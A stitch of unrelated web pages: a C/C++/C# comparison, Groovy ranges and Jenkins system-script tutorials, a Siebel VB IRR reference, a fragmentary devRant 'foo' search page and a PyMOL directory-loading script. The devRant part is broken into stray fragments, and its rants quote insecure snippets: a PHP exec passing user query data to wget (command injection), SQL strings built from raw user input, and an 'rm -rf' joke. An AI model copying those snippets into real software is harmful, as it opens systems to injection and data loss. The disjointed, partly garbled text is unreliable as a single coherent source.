Intermediate Programmers If you’re already familiar with some programming concepts and you’ve learned to code in some other languages already, you may want to start with C++ instead. Object-oriented programming languages are much more common nowadays than procedural languages, and if you’ve already got some experience in OOP, you’ll find C++ easier to learn. Advanced Programmers If you have already learned multiple programming languages and you’re trying to increase your skill level, then your choice of the three C languages will depend on what you’re hoping to gain from the experience. Some younger programmers choose to study C as a way to learn the basics of coding. Veteran programmers tend to look down on the younger generation for not respecting their roots, so knowledge of C can work as a sort of street cred at a new job. C++ is still very widely used in the workplace, and knowing how to code in it can open up all sorts of job opportunities. If you’ve already spent time working with object-oriented languages, and you’re looking for another language to add to your resume with minimal effort, C++ is a great choice for that. If your primary desire is to get into .NET and web-based development, C# might be your best option. While it doesn’t get used as frequently as the other two languages, it’s still in high demand in enterprise-level development teams. Photo credit to Webstorm IDE Conclusion Understanding the differences between C#, C++, and C will make it much easier for you to choose which languages to focus on. All of them have their own advantages and disadvantages, and none of them would be a waste of time to learn. The choice is yours!
https://csharp-station.com/understanding-the-differences-between-c-c-and-c/
Ranges in Groovy are lists containing sequential values. A range is of type Range (from Java) and extends java.util.List. As an example, consider a demographic range for a target radio audience for ages 18 to 30. The values stored in this list would be 18, 19, 20 and so on, up to and including 30. We will explore this scenario in the example below. To learn how to use ranges in Groovy, follow these 3 steps:

def targetAudienceAges = 18..30
def sampleAge = 27

println "$targetAudienceAges"
println "First age in range: ${targetAudienceAges.from}"
println "Last age in range: ${targetAudienceAges.to}"

if (sampleAge >= targetAudienceAges.from && sampleAge <= targetAudienceAges.to) {
    println "Sample age is within target audience range"
} else {
    println "Sample age is not within target audience range"
}

println "Here are the ages in the list:"
for (int age : targetAudienceAges) {
    print "$age "
}

The range targetAudienceAges contains the integers 18 up to and including 30. Note the from property that gives us access to the first number in the range. The to property references the last number in the range. We can verify that a given integer, e.g., sampleAge, is present in the range by applying an if statement as shown in the source code. The program then prints out each age in the list.
https://www.webucator.com/how-to/how-use-ranges-groovy.cfm
Jenkins only provides the current revision in the environment variable $SVN_REVISION. Of course Jenkins knows the information about changed files of each build as it is shown in the build status page. I guess a plugin would be able to access the model, but that is too much work. Fortunately the Jenkins Groovy plugin allows scripts to run under the system context having access to hudson.model.Buildand other classes. The Groovy programming language is a dynamic language which runs on the JVM. It integrates smoothly with any Java program and is the first choice for scripting Java applications. While not strictly necessary I recommend downloading the SDK's zip and unpacking it on the host where you run Jenkins, usually into the folder where you keep your development tools. For testing and debugging I also install it on my local workstation (in the same location). Groovy in Jenkins Next comes the Jenkins Groovy plugin. Open Jenkins in the browser and navigate the menus: - Manage Jenkins - Manage Plugins - select tab Available - filter "groovy" - select Groovy - Install - Manage Jenkins - Global Tool Configuration - go to section Groovy - Add Groovy: Give it a name and set GROOVY_HOMEto the folder you unpacked it, e.g. /tools/groovy-2.4.11. - deselect Install automatically - Save Run a Groovy script in the build Now let's use a Groovy script in the project. On the project page, - Configure - go to section Build - Add build step - select Execute system Groovy script - paste Groovy code into the script console - Save Debugging the Script Of course it does not work. How can I debug this? Can I print something to the console? Groovy's println "Hello"does not show up in the build log. Searching again, finally the gist by lyuboraykov shows how to print to the console in system scripts: Jenkins provides the build console as outvariable, out = getBinding().getVariables()['out']which can be used like out.println "Hello". Much better, now I can debug. 
Let's wrap the out.println in a def log(msg) method for later. StackOverflow answer by ChrLipp shows how to get the changed files of the current build:

def changedFilesIn(Build build) {
    build.getChangeSet().
        getItems().
        collect { logEntry -> logEntry.paths }.
        flatten().
        collect { path -> path.path }
}

This gets the change set hudson.scm.ChangeLogSet<LogEntry> from the build, gets the SubversionChangeLogSet.LogEntrys from it and collects all the paths in these entries - this is the list of all file paths of all changed items in all commits (LogEntrys). I guess when another SCM provider is used, another type of ChangeLogSet.LogEntry will be returned, but I did not test that. To better understand what is going on, I added explicit types in the final Groovy script, which will only work for Subversion projects.

Getting all builds since the last successful one

I want all changed files from all builds since the last green one because they might not have been processed in previous, failed builds. Again StackOverflow, answer by CaptRespect comes to the rescue:

def changedFileSinceLastSuccessfull(Build build) {
    if (build == null || build.result == Result.SUCCESS) {
        []
    } else {
        changedFilesIn(build) +
            changedFileSinceLastSuccessfull(build.getPreviousBuild())
    }
}

In case there is no previous build or it was successful, the recursion stops; otherwise we collect the changed files of this build and recurse into the past.

All Together

Let's put it all together:

def changedFiles() {
    def Build build = Thread.currentThread()?.executable
    changedFileSinceLastSuccessfull(build).
        unique().
        sort()
}

After collecting, all duplicates are removed, as I do not care if a file was changed once or more times, and the list is sorted. In the end the list of changed files is saved as text changed_files.log into the workspace. (The complete jenkins_list_changed_files.groovy script is inside the zipped source.)
I saved the code as jenkins_list_changed_files.groovy, put that under version control and changed the build definition step to use the script's file name. Next time the build ran, the script file would be executed, or at least so I thought.

Script Approvals

Unfortunately system Groovy script files do not work as expected because Jenkins runs them in a sandbox. Scripts need certain approvals, see StackOverflow answer by Maarten Kieft. To approve a script's access to sensitive fields or methods navigate to

- Manage Jenkins
- In-process Script Approval (This is the second-to-last item in the list.)
- Approve

jenkins_list_changed_files needs a lot of approvals:

field hudson.model.Executor executable
method groovy.lang.Binding getVariables
method hudson.model.AbstractBuild getChangeSet
method hudson.model.AbstractBuild getWorkspace
method hudson.model.Run getNumber
method hudson.model.Run getPreviousBuild
method hudson.model.Run getResult
method hudson.scm.SubversionChangeLogSet$LogEntry getPaths
method java.io.PrintStream println java.lang.String
new java.io.File java.lang.String
staticMethod java.lang.Thread currentThread
staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods flatten java.util.List
staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods println java.lang.Object java.lang.Object
staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods sort java.util.Collection
staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods withWriter java.io.File groovy.lang.Closure

Creating a new java.io.File might be a security risk, but even println is not allowed. Adding all these approvals is a boring process. The build breaks on each missing one until everything is well. As soon as you have all the approvals, you can copy Jenkins' scriptApproval.xml found in JENKINS_HOME (e.g. ~/.jenkins) and store it for later installations. The full scriptApproval.xml is inside the zipped source.

Conclusion

Jenkins' Groovy integration is very powerful.
System scripts have access to Jenkins' internal model, which allows them to query information about builds, status, changed files etc. On the other hand, development and debugging are cumbersome and time consuming. IDE support helps a lot. Fortunately StackOverflow knows all the answers! ;-)
http://blog.code-cop.org/2018/07/only-modified-files-in-jenkins.html
Siebel VB Language Reference > VB Language Reference > IRR Function

This standard VB function returns the internal rate of return for a stream of periodic cash flows.

IRR(valuearray( ), guess)

valuearray( )   An array containing cash-flow values
guess           An estimate of the value returned by IRR

Returns: The internal rate of return for a stream of periodic cash flows.

Valuearray( ) must have at least one positive value (representing a receipt) and one negative value (representing a payment). Payments and receipts must be represented in the exact sequence. The value returned by IRR varies with the change in the sequence of cash flows. In general, a guess value of between 0.1 (10 percent) and 0.15 (15 percent) is a reasonable estimate.

IRR is an iterative function. It improves a given guess over several iterations until the result is within 0.00001 percent. If it does not converge to a result within 20 iterations, it signals failure.

This example calculates an internal rate of return (expressed as an interest rate percentage) for a series of business transactions (income and costs). The first value entered must be a negative amount, or IRR generates an "Illegal Function Call" error.

Sub Button_Click
   Dim cashflows() as Double
   Dim guess, count as Integer
   Dim i as Integer
   Dim intnl as Single
   Dim msgtext as String
   guess = .15
   count = 2
   ReDim cashflows(count + 1)
   ' the first cash flow must be a negative amount (a payment),
   ' otherwise IRR generates an "Illegal Function Call" error
   cashflows(0) = -3000
   For i = 1 to count
      cashflows(i) = 3000
   Next i
   intnl = IRR(cashflows(),guess)
   msgtext = "The IRR for your cash flow amounts is: "
   msgtext = msgtext & Format(intnl, "Percent")
End Sub

See Also: FV Function, IPmt Function, NPV Function, Pmt Function, PPmt Function, PV Function, Rate Function
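The iterative improvement the reference describes (refine a guess until the result converges, and signal failure after 20 iterations) can be sketched outside Siebel VB. Here is an illustrative Python version using Newton's method with a numerical derivative; the actual Siebel implementation is not documented here, so treat this only as a model of the behaviour:

```python
def npv(rate, cashflows):
    """Net present value of periodic cash flows at the given rate."""
    return sum(cf / (1.0 + rate) ** i for i, cf in enumerate(cashflows))

def irr(cashflows, guess=0.15, max_iter=20, tol=1e-9):
    """Find the rate at which NPV is zero, starting from guess.

    Mirrors the documented behaviour: improve the guess iteratively,
    and signal failure if it does not converge within 20 iterations.
    """
    rate = guess
    for _ in range(max_iter):
        value = npv(rate, cashflows)
        if abs(value) < tol:
            return rate
        h = 1e-7                          # numerical derivative of NPV
        slope = (npv(rate + h, cashflows) - value) / h
        rate -= value / slope             # Newton step
    raise ValueError("IRR did not converge in %d iterations" % max_iter)

# As in the reference, the stream must mix payments (negative) and
# receipts (positive) for an internal rate of return to exist:
rate = irr([-3000, 1000, 1200, 1500])
```
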
http://docs.oracle.com/cd/B31104_02/books/VBLANG/VBLANGVBLangRef133.html
CC-MAIN-2014-52
refinedweb
263
54.52
Search - "foo" - Anybody else here has a coworker who insists on having comments everywhere and writes code like this? // Get foo foo = getFoo(); // Check if foo is greater than bar if (foo > bar) Or is it just me?21 - Void foo() { try { //Try something } catch(exception e) { foo(); } } When I saw this in production I cried a little...9 -15 - That time when you code up something really cool (to you, that is...) and none of your friends understand. Me: "Look at this cool thing!" Them: "Looks like a bunch of numbers." Me: "But they mean foo, bar, and baz!" Them: "Whatever." :(3 - - !rant Thinking about quitting my job and opening a bar named "foo" where the walls have a tapestry of random foo-bar code examples. (Easy conversation starter for programmers)8 - - - - - - First time ranter here.. So I started to work in this big company with allegedly many talented devs. All excited to start and learn a whole bunch of new stuff. There was this dev, with gazillion years of experience. We were working on similar parts of the code base and he told me I should be reusing his module. I opened the module sources to learn about its internals. Oh boy... To illustrate it best, let's say there was a function called foo. It was doing one thing. There was also a function called foo1. Doing almost exactly the same thing. There was also fooA. And I kid you not, there was a fooA1. All of them were doing almost the same thing. Almost all of the functions were documented. The documentation for foo would be: "This does X. I don't like how it does it, so there is foo1 which is better." Additionally, only 1 of the functions was in use... It doesn't end here. There were functions named like: cdacictad You ask what it means? Well it means "clean directory and copy its contents to another directory" of course...
Months later he is no longer with us. I deleted this module. PS Glad to be here ;)16 - How i used to toggle a boolean: foo ? false : true; How i decided to toggle a boolean last night: foo = !foo I wondered why i only just thought of that.18 - - - *Doesn't have Internet and bored as hell* *Starts to program something random with Python* *Wants to write something to a file, doesn't know how* *Intuition starts...* "foo = open('test.txt', 'w') foo.write('hello\n') foo.close()" *Runs program* *It actually fucking worked* Tell me something more simpler than Python.15 - - - - - “Never,never, never, NEVER eat raw userinput“ Referring to stuff like “insert into foo (bar) values ($_POST[username])“4 - So my boss copied a code from stackoverflow and thought "foo" was a function or something... It was just an alias to a SQL select...2 - I'm planning on making a band called Bar Fighters and will play songs like Integer Or Long, The Renderer, Test of U nit, Learn to Try ( catch )5 - - For a developers ranting social media platforms, it sure seems strange that we can't format code snippets... 🤔 At least something like `foo(bar){}` would be awesome!3 - - there are three kinds of programmers foo () { // those who use this } foo () { // those who do this } for () { } // and theres this16 - Does anyone else really dislike "foo", "bar" and "baz"? Because fuck me I do. My brain can't process that stuff, I need some actual real world context. or, maybe i'm just dumb.8 - - - Oauth2 examples. Seriously all examples I found use library that use library that use library to just build url encoded parameters like this client_secret=foo&code=bar Got me 5 hours to dig going trough couple of github repos with implementation to see that shit at the end. Seriously people !!! Start thinking before you write single line. I don’t want to download 10 dependencies and 100MB+ just to send 2 requests with url encoded parameters. It’s in every - literally every language. 
I know you’re stupid but please just try to understand how things work instead of copy paste another stackoverflow and medium snippet.4 - - - - One of our devs seems to love "attribution" comments in anything he writes. private void foo() { //Author: John Cribbins ...public static final int FOO_BAR = 21; //Author: John Cribbins I mean, I get it for an author tag at the top of a file, but certainly not on every field or method. Is this some kind of weird thing newer devs are encouraged to do these days?!10 - - A recipe for COMPLETELY hacking me off - ask for help, pretend my advice is bollocks, then rephrase it as your own and follow it up with a smart arse comment. "Almond, could you lend me a hand with this regex? I'm trying to match this particular group, but only if it doesn't have 'foo' after it." "Sure, take a look at negative lookaheads - that sounds like it's exactly what you need" "Nah that won't work for me, because I need to check for more than one character after it, I need to check for 'foo'" "What? That doesn't make sense, you can..." "Ah don't worry, I've found the answer by myself now, I can actually just add '?!' before the text I don't want to match and it'll do it - I'm fast becoming a regex expert here! Let me know if you want me to explain this to you" DAHHHHHHH THAT IS A NEGATIVE LOOKAHEAD YOU CRETIN3 - - So I finished uni three weeks ago. Interview for a my first junior web developer position a week ago. Received news yesterday that I got the job. It’s been a good couple weeks I’d say.3 - When you go make coffee and return to your code and see let foo = and you have no idea wtf was going to come next...4 - - Huh. ES6's variable destructuting on objects is actually pretty cool. var {foo, bar, baz} = obj Is functionally equivalent to this: var foo = obj.foo var bar = obj.bar var baz = obj.baz I like it! Makes things simpler.3 - - you know you should go home when you write "public private foo()". it's public ... but private ... 
but still public I'M DONE FOR THE DAY5 - - - - What my IDE says: "Method 'foo' is too complex to analyze by data flow algorithm". What it means: "Your code is shit and I just give up at trying to understand it" - - I've got a puzzle! How well do you know the weird GNU coreutils error messages? $ rm foo/ rm: cannot remove 'foo/': Is a directory $ rm -r foo/ rm: cannot remove 'foo/': Not a directory What am I?7 - - I swear to god you'll never feel more epic while coding than when you listen to the dovahkiin song.3 - - Master Foo and the Script Kiddie (from the Rootless Root Unix Koans of Master Foo).2 - God, Allman indentation style is such pain... God bless K&R... For those who don't know, Allman is this: void foo(void) { statement; statement; } and K&R is this: void bar(void) { statement; statement; }14 - "Hello, the drive of your XYZ server is getting full, would it be possible to prune some of the unused and/or old docker images and layers there please? Alternatively, we can offer to replace the drives with a higher capacity models for FOO extra per month" "Hello, the disk use keeps growing and has reached the 95% mark, please prune some of your images to make space for new. If you wanted to choose the alternate option of disk capacity increase, we would have to do that as soon as possible, otherwise you may run out of space before the RAID array rebuilds" "Hello, your server XYZ has completely ran out of disk space. Any changes that would require data being saved on disk may and probably will fail. Please free some space as soon as possible" Ugh, I hate clients that just don't cooperate until shit hits the fan... And no, we could not prune the space ourselves, its not our data to delete whenever we think it necessary. We merely manage the machine's operation, keeping it online and its services running - Find the odd one out : a) const int * foo b) int const * foo c) const * int foo d) int * const foo7 - - Boss: I want feature foo! 
Me: that will be a bit tricky because bar... Boss: It's easy, you just baz! Me: ok boss :) *hax around bar - A piece of code someone just pushed: In pseudocode ------------------------ Function foo() Result = GetFoo() If result != null DoStuff() Return result Else Result = null -------------------------- Ffs. It's written in a strongly typed language, and the whole function is in a try with an empty catch and inside yet another try with an empty catch. Guess he wanted to be sure no error got away.... Oh, and he has 9 years of experience, and since all paths don't return something it does not compile12 - - - My favorite command of day is 😂 rm -rf {foo}/{bar} Reference if you don't know what happened today: - Am I the only one who doesn't know where foo bar came from? I see it all the time but have no clue :/3 - Metasyntactic variables, you use them, but do you know their origin? This should be essential programmers knowledge: - - - - did not expect the stickers would actually arrive! you sent it all the way half of the earth. the stickers earn a deservedly special space on my laptop and phone. Kudos to you devRant!2 - When coworkers leave the co. for a better paying job and leave this kind of code after themselves: int foo = 1; String.format("blabla %s", Integer.toString(foo)); fml6 - - Alright since I have to deal with this shit in my part time job I really have to ask. What is the WORST form of abusing CSV you have ever witnessed? I for one have to deal with something like this: foo,1,2,3,4,5 0,2,4,3,2,1 0,5,6,4,3,1 bar,,,,, foobar,,,,, foo can either be foo, or a numeric value if it is foo, the first number after the foo dictates how many times the content between this foo and the next bar is going to be repeated. Mind you, this can be nested: foo,1,,,, 1,2,3,4,5,6 foo,10,,,, 6,5,4,3,2,1, bar,,,,, 1,2,3,4,5,6 bar,,,,, foobar,,,,, foobar means the file ends. Now since this isn't quite enough, there's also SIX DIFFERENT FLAVOURS OF THIS FILE. 
Each of them having different columns. I really need to know - is it me, or is this format simply utterly stupid? I was always taught (and fuck, we always did it this way) that CSV was simply a means to store flat and simple data. Meanwhile when I explain my struggle I get a shrug and "Just parse it, its just csv!!" To top it off, I can not use the flavours of these files interchangably. Each and everyone of them contains different data so I essentially have to parse the same crap in different ways. OK this really needed to get outta the system7 - - - - How many devs here got hired through Google's Foo Bar challenge or got the invitation? I got the invite and have sent my assignments for review. Anyone know what happens next.20 - Reporting is not fun.. Scenario 1: * A user says they need to export certain data from our system.. * Developer W makes report called "Foo detail report" Scenario 2: * A user says they need this report to also show some extra fields * Developer X makes a new report called "Foo detail report (extra fields)" Scenario 3: * A user says they need this report to be run with a different search criteria * Developer Y makes a new report called "Foo detail report (extra fields) by bar" Scenario 4: * A user says they need this report show data grouped in a different way * Developer Z makes a new report called "Foo detail report (extra fields) by bar- new grouping" The above scenarios happened over and over for several years in no particular order... Current Day: * Some users have certain reports they use and rely on but we don't know which ones * Nobody really knows what all of the reports do or what is the difference between them without looking at the sql * If we want to change data structures we have many reports to update * I have a request from a user to add an extra column to one of the reports1 - Laravels error reporting is sometimes fucking useless. Yesterday it wrote into the logs "class foo doesn't exist". 
I triple checked the including of this class. Checked the namespaces. Checked the classnames. Everything was ok. Today I removed the content of this particular class, which returned an array. And the error was gone... After further search I realized I was missing commas within the array deceleration... Why the fuck you don't just tell me this????!?4 - There should be a post type “facts” || “dev hints” || something like that where we can post cool stuff we figured out.. Like how to replaceAll in JS? “Hello ranters”.split(“e”).join(“foo”); JS devs probably know this but I didn’t, so yeah..3 - Just got off the phone with a csr about a bug they found. No biggie, I said I'd fix it. Basically until it gets fixed I told them that when they do their process to make sure to do "foo" first, then "bar" second. As soon as I got off the phone, had to poop so I went to the bathroom, and as soon as I sat down I get a message from the same CSR, "Hey I did bar first, can I type foo then bar again?" WTF DID I JUST SAY LITERALLY 2 MINUTES AGO ON THE PHONE. TBH IT WOULD BE BETTER IF YOU JUST DIDNT DO ANYTHING FOR 15 MINUTES BUT NOW I HAVE TO COMB CLOUD FUNCTION LOGS, FIND THE DOC UID YOU CREATED, FIND THE DOC YOU MADE, DELETE IT, DELETE THE ASSIGNMENT IN YOUR TRASH ASS WORKPLACE PORTAL, AND STILL FIX THE SAID BUG4 - -?7 - - - -?18 - Quickly coming to the terms with the fact that software development inside companies is just the perpetual motion of putting out fires as quickly as possible just so customers can still be ignorant cunts. - Still find it amazing how archaic command prompt is, why do we still need to manually select which drive we want before cd'ing into the directory... Why can't we just do cd D:/foo/bar, I understand you want us to use PowerShell Microsoft but you are the company that still ships internet explorer so please at least bring it up to standard a little -,-2 - -?12 - - The document.getElementbyId function . It is so long. 
Also this probably does not count, but the export builtin does not accept whitespace before and after the = sign. So instead of export PATH = "$PATH:/foo/bar/baz" you need to write export PATH="$PATH:/foo/bar/baz"8 - There's two types of people: if ($foo == $bar) { // Something... } AND if($foo==$bar) { // Something... }11 -.
when you read his code you’ll find a lot of Foo<T> , TModel, TKey and a lot of reflection5 - I really want my dev team to ask me to go to happy hour so I can suggest meeting at Foo Bar. Though, that may be why no one's asked. -. - Came to the realisation that I wasted three years in uni, today my final grades were released - for those who give a shit I got a first I was happy till I realised I got my dev position without them even knowing my final grade.3 - Guess I'm getting old (school) outputting foo, bar and baz for testing purpose. Does anyone still using those too?5 - -. - - There are few things I hate more in software development than writing mappings from shitty SOAP apis to JSON.2 - - While everyone is hating proper programming languages... Let's talk about quotes in batch files. What the actual fuck did Bill smoke while developing this boolshit?2 - LPT you can just write debug(foo) and it'll break as soon as chromium debugger hits a foo function call. Undoable by using undebug(foo).2 - EDITOR=nano sudoedit foo Spare me please… It's not that I don't know how to use vim/vi, I'm just lazy to get used to it…2 - Our software outputs some xml and a client has another company loading this xml into some data warehouse and doing reporting on it. The other company are saying we are outputting duplicate records in the data. I look and see something like this: <foo name="test"> <bar value="2" /> <bar value="3" /> </foo> They say there are two foo records with the name test.. We ask them to send the xml file they are looking at. They send an xlsx (Excel!) file which looks like this: name value test 2 test 3 We try asking them how they get xlsx from the xml but they just come back to our client asking to find what we changed because it was working before. Well we didn't change anything. This foo has two bar inside it which is valid data and valid xml. If you cant read xml just say so and we can output another format! - Just learned the "hello world" of foo language. 
Super cool...let's make some changes: "Foo Programmer and Developer. 23 years of experience, 2 gazillion Foo projects in production" added to bio - Found myself in a career predicament. I’m currently working at a tech startup and it really does have the potential to really take off. But recently the CEO has taken compressed working and remote working off the table for the most part which at this stage in my life is quite important. Today I was offered a position at a different company with 4/5 days a week with a 10% pay increase. Now the time has come to make a decision and I really don’t know what to do because I’m pretty sure the worst thing for me to do is make the wrong choice and end up kicking myself in a years time. Was wondering if any of y’all have had to make a similar choice in your career7 - - If you want this app better, stop posting crappy content or content you have to end up explaining. Simple, isn't it?4 - 'cat file | grep foo' .... For some unknown reasons, too. It sends shivers down my spine all the time - - - package bar; public class Foo { public static void main(){ System.out.println("Hello, World!"); } } I still wonder why I didn't start with Python, print('Hello, World') is a god damn one-liner11 -? - soo, i am unknowledgeable of ALL best practice. lets say i call a php file called loader.php with a $_GET['type'] parameter, then after i check if type is actually set i switch the parameter and my logic then does stuff appropriate for $type.. do i create a lot of sub files with the program logic in it or do i just create subfunction (which i have to pass variables if necessary)? Switch( $_GET['type'] ) { case 'foo': include "logic/foo.php"; break; default: echo "error"; break; } or is the whole concept totally alien and stupid? i most honestly say that i dont know exactly what i could google to find an answer3 - So apparently the variable names foo and bar come from an old military term FUBAR which means f-ed up beyond all recognition.... 
Those OG UNIX guys hid their memes really well - - - Reading code and getting that face palm moment String code = customer.getCode(); customer.setAccount("foo"); customer.setGroup("bar"); customer.setCode("new code"); Ok this is preparing the customer obj makes sence. Some 20 lines later customer.setCode(code);...... Wtf1 -. :) - My regex foo has gotten really weak. It took me unholy number of attempts to get ^\n{1,}$ right 😞.1 - - (Warning, wall of text) Settle an argument for me. Say you have a system that deals with proprietary .foo files. And there are multiple versions of foo files. And your system has to identify which version of foo you are using and validate the data accordingly. Now the project I was on had a FooValidator class that would take a foo file, validate the data and either throw an error or send the data on its merry way through the rest of the system. A coworker of mine argued that this was terrible practice because all of the foo container classes should just contain a validate method. I argued that it was a design choice and not bad practice just different practice. But I have also read that rather than a design choice that having a FooValidator is the right way to do OOP. Opinions?1 - Do you write your comments before or after you write the code? Do you write var foo = 1; and then go back a line above it / beside it to comment, or do you write the comment line / block first prior to writing the code statement?6 - Using variables names like asd, qwe, a, x in demo/tests. But using "Foo, bar" before shoeing to anyone. - <?php // This is the demo code of a PHP gotcha which took me some hours to figure out $hr = "\n<hr>\n"; $JSON = '{"2":"Element Foo","3":"Element Bar","Test":"Works"}'; $array = (array)json_decode($JSON); echo "Version: " . phpversion() . 
$hr; // Tested on: 5.5.35 and 7.0.15 var_dump($array); // Prints: array(3) { '2' => string(11) "Element Foo" '3' => string(11) "Element Bar" 'Test' => string(5) "Works" } echo $hr; var_dump($array['Test']); // Prints: string(5) "Works" echo $hr; var_dump($array[2]); var_dump($array['2']); var_dump($array["2"]); var_dump($array[3]); var_dump($array['3']); var_dump($array["3"]); // Prints: NULL + Notice: Undefined offset ... in ... echo $hr; $newArray = array(); foreach ($array as $key => $value) $newArray[$key] = $value; var_dump($newArray[2]); var_dump($newArray['2']); var_dump($newArray["2"]); // Prints three times: string(11) "Element Foo" var_dump($newArray[3]); var_dump($newArray['3']); var_dump($newArray["3"]); // Prints three times: string(11) "Element Bar"1 - Ok so I got namespace N. And namespaces N\a and N\b. I would like N\a\foo() to call N\b\bar(). But no matter what I do it says \N\b\bar() does not exist. What am I doing wrong?? I've tried including, using, requiring but nothing.8 - - package main // go is very frustrating. in their efforts to keep the language simple, they've broken its consistency :( // A A is just some arbitrary interface type A interface { Foo() } // B is an interface requiring a function that returns an A type B interface { Bar() A } // Aimpl implements A type Aimpl struct{} // Foo is Aimpl's implementation of A func (a Aimpl) Foo() {} // Bimpl attempts to implement B type Bimpl struct{} // Bar is Bimpl's attempt at implementing B. // problem is, if Bar returns an Aimpl instead of A, the interface is not satisfied // this is because Go doesn't support implicit upcasting on returns from interfaced objects. // if we were to simply change the declared return type of Bar() to 'A', without changing // the returned value, Bimpl will satisfy B. func (b Bimpl) Bar() Aimpl { return Aimpl{} } var _ B = Bimpl{} func main() { }2 - - Here's a fun fact (which actually will be accompanied with a source) about node.js. 
When you import or require a module it will be imported as a singleton. Or put another way, ```export const Foo = { };``` is one of the simplest* and most readable singletons you can have in that runtime. And of course here's the thing you always should be asking for when people make a claim like this... So why write this? Well some of you might feel inclined to write a medium (or other) post about "design patterns in Javascript" where you basically just translate the GOF book from Java to Javascript and now you have something that isn't just awkwardly translated Java code! - Just saw a production website where the routing looked like this:... - It's always a matter of much is there to do and in what language... There is the IDE-Zone, which is dominated by IntelliJ (CLion be praised when you do Rust or C++) for large stuff and heavy refactorings. Always disputted by VS Code with synced settings. It's nice and comfy and has every imaginable language supported good enough, especially when its smaller change in native code or web/scripting stuff. Then there is the "small changes" space, where Vim and VS Code struggle whos faster or which way sticks better in my brain... might be you SCP stuff down from a box and edit it to re-upload, or you use the ever-present vi (no "m" unfortunately) sometimes things are more easy for multi-caret editing (Ctrl-D or Alt-J), and sometimes you just want to ":%s/foo/bar/g" in vim. I am sure that each of these things are perfectly possible in each of the editors, but there is just reflexes in my editor choices. I try to stay flexible and discover strenghts of each one of my weapon of choice and did change the favorites. (Atom, Brackets, Eclipse, Netbeans, ...) However there are some things I tried often and they are simply not working for me... might for you. I don't care. 
and I'll just use some space to piss people off, because this is supposed to be a rant: nano just feels wrong, emacs is pestilence from satan that was meant for tentacles instead of fingers, sublime does cost money but should not, gives me a constant guilty feeling (and I don't like that) that, and all the editors from various desktop environments are wasted developer ressources. -. - - As hard as I fucking try, my stumbling block, every fucking time is exports/imports. I can't wrap my head around them, at all. What do you use in browser vs in node? Whats the *most commonly used standard*? Whats the difference between "modules.export = Foo;" vs "exports.Foo = Foo;" what about export class Foo? Is that the same as modules.export or export.Foo? Look at this shit... import FooComponent from "./Foo"; export default Foo const Foo = require("./foo") const Foo = require("./foo.js").Foo import { Foo } from "./Foo.js"; And probably a dozen others I don't know about. Why does there have to be so many fucking ways to do a fucking import/export? What the fuck is going on here?8 - I took a long time to use prepared statements in a production php application instead of directly constructing the SQL query with the variables I had... Like $sql = 'SELECT * FROM foo WHERE y = '.$search; - Failing to self study because i always get stuck on tutorials like so: Do a, now do b. You should now get C. You can then proceed with d etc. BUT I DON'T GET C. WHY NOT?! I FOLLOWED ALL YOUR FUCKING STEPS YOU SHITTY GUIDE/BOOK/ASSHOLE. So i had to get basics from school where i could ask questions to such stupid things. It got better, but i sometimes still run in to it, and still can't google foo my way out of it. 
- - TypeScript has two levels of private values (at least in the beta): private foo = false; // Cannot be accessed outside the object in TypeScript #bar = false; // cannot be accessed outside the object in both TypeScript and JavaScript.2 - I'm trying to map, for example, something like to something like. I'm pretty sure it's doable but I'm having a terrible time getting it to work.3 - - I'll listen to an album, try and understand the story, and search for the truth. I used to let musicians guide me. I'd look to them.. Musicians are great marketers. They're compelling, emotionally intelligent, and spiritual. What I'm trying to say is, I learned a lot of game from musicians. Seduction.. and that'll only get you so far. I just became aware of programming not too long ago. I have a mentor on money, real estate, seduction, fashion, marketing, but I don't know anyone who is the guru of programming and development.2 - And here comes the next solution ... exec("wget ".$foo." > /dev/null 2>&1 &"); $foo contains data from the users query ... - I have a readonly object property foo on a typescript class. When I create an instance bar by calling the constructor, bar.foo doesn't compare equal to this.foo as seen from within bar several async calls later. What could I have possibly fucked up?5 - - -... Look at how they write docs: "->atPath('foo')" how can I fucking know what to pass instead of foo? I cannot make it show the fucking error message near the field. Are they writing such docs so that we would spend more time searching how to make it show a fucking simple error message? "The atPath() method defines the property which the validation error is associated to. Use any valid PropertyAccess syntax to define that property." The property on my entity is a collection of $values . Tried passing 'values' - no effect.2 -
https://devrant.com/search?term=foo
CC-MAIN-2021-10
refinedweb
5,228
72.46
LoadDir
From PyMOLWiki

Overview

Load all files of the suffix suff from the directory dirName, where suff and dirName are function parameters.

Install

- copy the source below to a file called "loadDir.pml" somewhere on your computer
- load the file with "run /your/path/toLoadDir/loadDir.pml"
- run loadDir. See examples below.

Examples

# load the script
run ~/loadDir.pml

# load all SD files from /tmp
loadDir /tmp, sdf
loadDir /tmp, .sdf
loadDir /tmp, *.sdf

# even stupid stuff works; hopefully as one would want.
# load all PDBs from /tmp
loadDir /tmp, foo.woo.pdb

# load all the PDBs in all the directories under ./binders/ERK
loadDir ./binders/ERK/*, .pdb

# load the PDBs into groups: now we can load all the files in the tree under
# ./ERK into the group "ERK" and the files from ./SYK into the group "SYK"
loadDir ./binders/ERK/*, .pdb, group=ERKb
loadDir ./binders/SYK/*, .pdb, group=SYKb

The Code

from glob import glob
from os.path import sep, basename

def loadDir(dirName=".", suff="pdb", group=None):
    """
    Loads all files with the suffix suff (the input parameter) from the
    directory dirName.

    dirName: directory path

    suff: file suffix. Should be simply "pdb" or "sdf" or similar. Will
    accept the wildcard and dot in case the user doesn't read this. So,
    "*.pdb", ".pdb", and "pdb" should work. The suffix can be anything
    valid that PyMOL knows how to natively load.

    group: group name to add the files to.

    example:
    # load all the PDBs in the current directory
    loadDir

    # load all SD files from /tmp
    loadDir /tmp, "sdf"

    notes: make sure you call this script w/o quotes around your
    parameters: loadDir ., .pdb as opposed to loadDir ".", "*.pdb".
    Use the former.
    """
    g = dirName + sep + "*." + suff.split(".")[-1]
    for c in glob(g):
        cmd.load(c)
        if group != None:
            cmd.group(group, basename(c).split(".")[0], "add")

cmd.extend("loadDir", loadDir)
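The suffix handling is the part most worth noting: loadDir keeps only the last dot-separated piece of suff, which is why "pdb", ".pdb", "*.pdb" and even "foo.woo.pdb" all behave the same. That normalization can be tried outside PyMOL (cmd is only available inside PyMOL, so this sketch stops at building the glob pattern):

```python
from os.path import sep

def build_pattern(dirName=".", suff="pdb"):
    # Same expression loadDir uses: tolerate "pdb", ".pdb", "*.pdb",
    # or even "foo.woo.pdb" by keeping only the final extension.
    return dirName + sep + "*." + suff.split(".")[-1]

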